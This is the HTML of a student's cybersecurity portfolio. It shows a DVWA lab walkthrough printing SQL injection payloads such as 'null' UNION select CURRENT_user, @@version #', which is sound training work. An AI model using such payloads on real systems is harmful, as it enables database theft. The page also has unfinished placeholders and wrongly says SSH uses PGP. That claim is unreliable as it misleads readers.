          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
